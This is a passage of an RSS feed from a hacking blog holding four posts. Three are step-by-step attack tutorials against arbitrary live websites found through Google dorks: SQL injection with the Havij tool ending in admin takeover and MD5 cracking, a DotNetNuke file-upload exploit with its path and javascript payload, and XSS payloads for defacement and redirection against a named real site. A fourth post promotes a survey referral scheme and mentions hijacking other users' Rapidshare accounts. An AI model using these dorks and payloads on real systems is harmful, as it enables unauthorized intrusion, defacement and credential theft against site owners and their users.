		<dc:creator>Irfan Shakeel</dc:creator>
				<category><![CDATA[Hacking Forum]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server Hacking]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[google dorks]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Havij]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[vulnerablibity]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1807</guid>
		<description><![CDATA[SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-1808" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/sql_img.jpg" alt="" width="300" height="225" />SQL injection is an attack in which malicious code is inserted into  strings that are later passed to an instance of SQL Server for parsing  and execution. Any procedure that constructs SQL statements should be  reviewed for injection vulnerabilities because SQL Server will execute  all syntactically valid queries that it receives. Even parameterized  data can be manipulated by a skilled and determined attacker.</p>
<p style="text-align: justify;"><span id="more-1807"></span>SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.</p>
<p style="text-align: justify;">In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps  penetration testers to find and exploit SQL Injection vulnerabilities on  a web page.</p>
<ul style="text-align: justify;">
<li>You can download havij from <a href="http://www.itsecteam.com/en/projects/project1.htm">here</a>.</li>
<li>We will use google dorks to find the vulnerable websites, there is a big list of google dorks  which I will post in my future articles but at this time we will only use the following:</li>
</ul>
<p style="text-align: justify;"><em> </em></p>
<blockquote style="text-align: justify;"><p><em>inurl:index.php?id=</em></p>
<p><em>inurl:trainers.php?id=</em></p>
<p><em>inurl:buy.php?category=</em></p>
<p style="text-align: justify;"><em>inurl:article.php?ID=</em></p>
</blockquote>
<p style="text-align: justify;"><em> </em></p>
<ul style="text-align: justify;">
<li>Just search google using one of the dork and you will see a lot of vulnerable websites.</li>
<li>Open any one of the website than put <em> &#8216;</em> after the link look:</li>
</ul>
<ul style="text-align: justify;">
<li>If you get the following SQL error, that means the website is vulnerable to SQL-injection attack.
<p style="text-align: center;"><img class="aligncenter size-full wp-image-1810" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/21.jpg" alt="" width="515" height="437" /></p>
</li>
<li>Now open Havij and paste the link without &#8216;
<p style="text-align: center;"><img class="size-medium wp-image-1813  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/1-273x300.jpg" alt="" width="359" height="394" /></p>
<p style="text-align: center;"><img class="size-medium wp-image-1816  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto2-274x300.jpg" alt="" width="364" height="399" /></p>
</li>
<li>Now we have to find the columns of the database.
<p style="text-align: center;"><img class="size-medium wp-image-1815  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto3-274x300.jpg" alt="" width="366" height="399" /></p>
<p style="text-align: center;"><img class="size-medium wp-image-1819  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto4-275x300.jpg" alt="" width="372" height="405" /></p>
</li>
<li>After this you will be able to find the admin id or password but remember normally web server uses MD5 encryption technique, you have to decrypt this password use havij option MD5 or you may read our tutorial on <a title="Cracking MD5" href="http://www.hungry-hackers.com/2008/06/cracking-md5.html" target="_blank">Cracking MD5</a>.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto5.jpg"><img class="size-medium wp-image-1818  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto5-274x300.jpg" alt="" width="359" height="392" /></a></p>
<ul style="text-align: justify;">
<li>After decrypting the password, you have to find the admin login page of the website. To do that use Havij options.</li>
<li>Now you may login as the admin user and control the website as you want.</li>
<li>H@ppy H@cking</li>
</ul>
<p><strong>Video Tutorial</strong></p>
<p style="text-align: justify;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="350" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="play" value="false" /><param name="quality" value="high" /><param name="scale" value="showall" /><param name="src" value="http://www.youtube.com/v/Qvhdz8yE_po" /><embed type="application/x-shockwave-flash" width="425" height="350" src="http://www.youtube.com/v/Qvhdz8yE_po" scale="showall" quality="high" play="false"></embed></object></p>
<p style="text-align: justify;"><strong>About The Author</strong></p>
<p style="text-align: justify;"><strong>Irfan Shakeel </strong>is an  ethical hacker/penetration tester and he have found many bugs on the  famous web server. He is the founder of Ethical <a href="http://www.ehacking.net/" target="_blank">Hacking Blog.</a></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1807&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>How to get your own Rapidshare Premium Account</title>
		<link>http://www.hungry-hackers.com/2011/02/how-to-get-your-own-rapidshare-premium-account.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/how-to-get-your-own-rapidshare-premium-account.html#comments</comments>
		<pubDate>Sun, 06 Feb 2011 08:57:00 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Freeware]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[RapidShare Hacking]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Money]]></category>
		<category><![CDATA[Online]]></category>
		<category><![CDATA[Rapidshare]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1785</guid>
		<description><![CDATA[Hello Friends,

Everybody wants a personal Rapidshare premium account but not all can afford it. If you are one of those people who can't afford it or don't want to ask your parent to buy you one then there are only 2 ways of getting a Rapidshare premium account. First one is to hack a Rapidshare premium account of some other user. But Rapidshare guys are very smart. They provide users with a feature of locking their account due to which you will need access to the email account of that victim to change the password of that Rapidshare account. Thus you can only use that hacked account till the owner of that account changes the password. This one seems to be a temporary solution. Second way is to earn some easy bucks online and buy your own Rapidshare account. The second way may seem difficult at first but to tell you the truth its very easy.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Hello Friends,</p>
<p style="text-align: justify;">Everybody wants a personal Rapidshare Premium account but not all can afford it. If you are one of those people who can&#8217;t afford it or don&#8217;t want to ask your parent to buy you one then there are only 2 ways of getting a Rapidshare premium account. First one is to hack a Rapidshare premium account of some other user. Hacking a Rapidshare premium account isn&#8217;t that difficult. But Rapidshare guys are very smart. They provide users with a feature of security lock due to which you will need access to the unlock code for that account to change the password of that Rapidshare account. Thus you can only use that hacked account till the owner of that account changes the password. This one seems to be a temporary solution. Second way is to earn some easy bucks online and buy your own Rapidshare account. The second way may seem difficult at first but to tell you the truth its very easy.</p>
<p style="text-align: center;"><img class="aligncenter" title="Rapidshare Premium" src="http://www.hungry-hackers.com/wp-content/uploads/2010/05/RapidShare.gif" alt="Rapidshare Premium" width="300" height="300" /></p>
<p style="text-align: justify;">Today I will show how you can earn money online and that too without much difficulty. Just follow the steps given below:</p>
<p style="text-align: justify;">1. Create a <a title="PayPal" href="https://www.paypal.com/in/mrb/pal=84BMU8PDQP6ZY" target="_blank">Paypal Premium Account( Don’t Worry its free)</a> . When asked for credit card details simply say cancel. You do not need to fill it.</p>
<p style="text-align: justify;">2. Then Go to the following link:</p>
<blockquote>
<p style="text-align: center;"><a title="A W Surveys" rel="nofollow" href="http://www.AWSurveys.com/HomeMain.cfm?RefID=hungryhacker" target="_blank">http://www.AWSurveys.com</a></p>
</blockquote>
<p style="text-align: justify;">3. On joining this website, you will get 27 USD just for writing 7 simple surveys which will take not more than 30 minutes.</p>
<p style="text-align: justify;">4. Now the only problem is that the minimum payout limit for this website is 75 USD. But you can earn 1.25 USD on referring this website to your friend.</p>
<p style="text-align: justify;">5. So you just take the referral link from this website and paste it on your facebook status. Don&#8217;t forget to mention about it benefits so that your friends register through that link.</p>
<p style="text-align: justify;">6. Suppose you have 500 friends on facebook and out of them only 10% register through your link then also you earn 62.5 USD which gets added to 27 USD that you had earned from surveys. Thus the total 89.5 USD crosses the Payout limit.</p>
<p style="text-align: justify;">7. Now you can get that money into your Paypal Account use it not only to buy your own Rapidshare premium account but also for buying other stuff online.</p>
<p style="text-align: justify;">8. That&#8217;s it. So Simple and I swear it works.</p>
<p style="text-align: justify;"><strong>Update:</strong> Some people have a compliant that Awsurveys doesn&#8217;t pay them what they have earned and that it is a SPAM. I would like to tell you that I have already used this website earlier and I had received the payment every time. I am not saying that these guys are lying about their experience with Awsurveys but there are few reasons why they may not have received the payment. The only problem with this website is that it doesn&#8217;t communicate with the user if he is violating any terms and conditions instead of that it just cancels their payments. When you request some payout from this website, they have a policy to verify if the accounts that were referred by the user are not fraudulent and they remove the amount gained from these fraudulent accounts from the total amount in your account. Sometimes the reduced amount is less than the amount redeemed by the user and their harsh policy is to cancel the whole payment without even reimbursing the remaining amount. Now you might be thinking how to avoid this? One advice i would give you is to keep atleast 20-25 USD in excess when you are redeeming the amount. In this way you are making sure that even if there were 15 accounts which the website found to be fraudulent still the total wont get below the amount requested by you. Another condition is  of the maximum amount that one can redeem in a year. A user can redeem at max 550 USD in one year if you request for payout more than that then hey will just cancel that payment without reimbursing the money in your account. I already faced the latter one which indicates that I have atleast earned upto 550 USD.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1785&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/how-to-get-your-own-rapidshare-premium-account.html/feed</wfw:commentRss>
		<slash:comments>22</slash:comments>
		</item>
		<item>
		<title>DNN (DotNetNuke) Hacking</title>
		<link>http://www.hungry-hackers.com/2011/02/dnn-dotnetnuke-hacking.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/dnn-dotnetnuke-hacking.html#comments</comments>
		<pubDate>Sat, 05 Feb 2011 08:54:38 +0000</pubDate>
		<dc:creator>Irfan Shakeel</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Server Hacking]]></category>
		<category><![CDATA[Dot Net Nuke]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[Website]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1744</guid>
		<description><![CDATA[<p>Hello Friends,</p>
<p>Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.</p>]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/5032283818_25b45d519c.jpg"><img class="alignleft size-medium wp-image-1750" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/5032283818_25b45d519c-300x225.jpg" alt="" width="300" height="225" /></a>Hello Friends,</p>
<p style="text-align: justify">Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.</p>
<p style="text-align: justify">DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.<span id="more-1744"></span></p>
<p style="text-align: justify">Below are the easy steps to implement the attack:</p>
<ul style="text-align: justify">
<li>First use a google dork to find the appropriate target.</li>
</ul>
<blockquote><p><em> inurl:&#8221;/portals/0&#8243; site:.com </em></p></blockquote>
<ul style="text-align: justify">
<li>You can change com to your desired domain name like bd ph ae</li>
<li>Now search your website on the google after searching you will get many websites choose any one of it.</li>
</ul>
<ul style="text-align: justify">
<li>Its time to check the required vulnerability on the website just place this code after the web address.</li>
</ul>
<blockquote><p><em> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx </em></p></blockquote>
<ul style="text-align: justify">
<li>For example if you got <em>www.victim.com</em></li>
<li>Replace it <em>www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx</em></li>
<li>If you will get this screen means this web is going to hack.</li>
</ul>
<p style="text-align: justify"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/dnn1.jpg"></a></p>
<p style="text-align: center"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/dnn1.jpg"><img class="size-medium wp-image-1745     aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/dnn1-300x279.jpg" alt="" width="300" height="279" /></a></p>
<p style="text-align: justify">
<ul style="text-align: justify">
<li>Now choose the third option &#8220;A File On Your Site&#8221; And than paste this java code on your address bar.</li>
</ul>
<blockquote><p>javascript:__doPostBack(&#8216;ctlURL$cmdUpload&#8217;,&#8221;)</p></blockquote>
<ul style="text-align: justify">
<li>It will allow you to upload a files on this website you can upload text ~ swf ~ jpg ~ gif ~ pdf ~ Files.</li>
</ul>
<p style="text-align: justify">
<ul style="text-align: justify">
<li>After uploading files you can find your file on this address www.victim.com/portals/0/yourfile.extension</li>
</ul>
<p style="text-align: justify">here extension is txt jpg swf etc.</p>
<ul style="text-align: justify">
<li>In our case</li>
</ul>
<blockquote><p><em>www.victim.com/portals/0/b.txt </em></p></blockquote>
<p style="text-align: left"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/dnn3.jpg"><img class="size-medium wp-image-1746   aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/dnn3-300x176.jpg" alt="" width="300" height="176" /></a><strong> </strong></p>
<p style="text-align: left">
<p style="text-align: left"><strong>About The Author</strong></p>
<p style="text-align: left"><strong>Irfan Shakeel </strong>is an ethical hacker/penetration tester and he have found many bugs on the famous web server. He is the founder of Ethical <a href="http://www.ehacking.net" target="_blank">Hacking Blog.</a></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1744&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/dnn-dotnetnuke-hacking.html/feed</wfw:commentRss>
		<slash:comments>22</slash:comments>
		</item>
		<item>
		<title>XSS Cross Site Scripting Attack</title>
		<link>http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html</link>
		<comments>http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html#comments</comments>
		<pubDate>Wed, 22 Sep 2010 15:18:41 +0000</pubDate>
		<dc:creator>rafay</dc:creator>
				<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[Cross Site Scripting]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1662</guid>
		<description><![CDATA[Previously I wrote about Remote File Inclusion vulnerability, However Ashik asked me to make another guest post on any topic related to Hacking as he was really busy, so I though to demonstrate another type of website hacking attack called Cross Site Scripting attack, a.k.a. XSS these vulnerabilities occur due to weak coding of the web applications. Once the hacker finds this vulnerability he/she injects malicious codes(Usually in web forms) to steal session cookies and later the hacker uses those cookies to gain access to sensitive page content.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.jpg"><img class="alignleft size-full wp-image-1674" title="xss" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.jpg" alt="" width="176" height="134" /></a>Previously I wrote about <a title=" Hack a Website Using Remote File Inclusion" href="http://www.hungry-hackers.com/2010/08/hack-a-website-using-remote-file-inclusion.html" target="_blank">Remote File Inclusion vulnerability</a>, However  Ashik asked me to make another guest post on any topic related to  Hacking as he was really busy, so I though to demonstrate another type  of website hacking attack called Cross Site Scripting attack,a.k.a. XSS. XSS  vulnerabilities occur due to weak coding of the web applications. Once  the hacker finds this vulnerability he/she injects malicious  codes(Usually in web forms) to steal session cookies and later the  hacker uses those cookies to gain access to sensitive page content.</p>
<p>Xss Cross Site Scripting may be classified in two types:</p>
<p><strong>1.</strong>Persistent XSS</p>
<p><strong>2.</strong>Non Persistent XSS</p>
<p>In order to demonstrate a XSS attack I will take an example of a website:</p>
<blockquote><p><a href="http://www.redwrappings.co.in/">http://www.redwrappings.co.in</a></p></blockquote>
<p><strong>Checking the venerability </strong></p>
<p>The simplest way to check the vulnerability is to enter the following code in the any web form present on the website</p>
<blockquote><p><strong>&lt;script&gt;alert(&#8220;XSS&#8221;)&lt;/script&gt;</strong></p></blockquote>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss.bmp"><img class="size-full wp-image-1666 aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss.bmp" alt="xss cross site scripting" /></a></p>
<p>Once the attacker inserts the code A dialog box like the below one will appear:</p>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.bmp"><img class="size-full wp-image-1667 aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.bmp" alt="" /></a></p>
<p><strong>Defacement</strong></p>
<p style="text-align: justify;">Now the attacker has found that the website is velnerable to an xss attack the attacker can do lots of damages to the website, The most common thing which the attacker will do is place his defacement image on that page showing that the website is hacked, For this purpose he will insert a code similar to the below one:</p>
<blockquote><p><strong>&lt;html&gt;&lt;body&gt;&lt;IMG SRC=&#8221;http://site.com/yourDefaceIMAGE.png&#8221;&gt;&lt;/body&gt;&lt;/html&gt;</strong></p></blockquote>
<p>Where <strong>http://site.com/yourDefaceIMAGE.png </strong>is the defacement image</p>
<p><strong>Inserting Flash Videos</strong></p>
<p>The attacker can also insert flash videos by entering the following code in any web form present on the website</p>
<p><strong>Redirection</strong></p>
<p style="text-align: justify;">The attacker can also redirect the page to any particular page , In case if the hacker has managed to find XSS venerability in the a website like paypal.com or alertpay.com he can redirect that page to a Phisher Site(Fake login page) where the victim will loose his password, To redirect a an xssed page to another page the attacker will insert a code similar to the below one:</p>
<blockquote><p><strong>&lt;script&gt;window.open( &#8220;http://www.google.com/&#8221; )&lt;/script&gt;</strong></p></blockquote>
<p style="text-align: justify;"><strong>Stealing Cookies</strong></p>
<p style="text-align: justify;">Most of the attackers after finding a website venerable to xss will probably steal victims cookies to gain access to their account or private data this method is called Session hijacking, which is a detailed topic and I will be explaining in the later articles <img src='http://www.hungry-hackers.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p style="text-align: justify;">Hope you have learned some XSS ,Feel free to ask if you have any problem regarding the above information</p>
<p style="text-align: justify;"><strong>About the Author</strong></p>
<p style="text-align: justify;">This is a guest post by Rafay baloch. Rafay Baloch is a the founder of <a title="Rafay Hacking Articles" href="http://rafayhackingarticles.blogspot.com/" target="_blank">Rafay Hacking Articles</a> and the writer of the book <a href="http://www.hungry-hackers.com/2010/08/a-beginners-guide-to-ethical-hacking.html"><strong>A Beginners guide To Ethical Hacking</strong></a><a href="../2010/08/www.hacking-book.com" target="_blank"></a></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1662&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
	</channel>
</rss>


<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching using disk: basic
Object Caching 1079/1305 objects using disk: basic

Served from: hungry-hackers.com @ 2012-02-12 02:14:27 -->
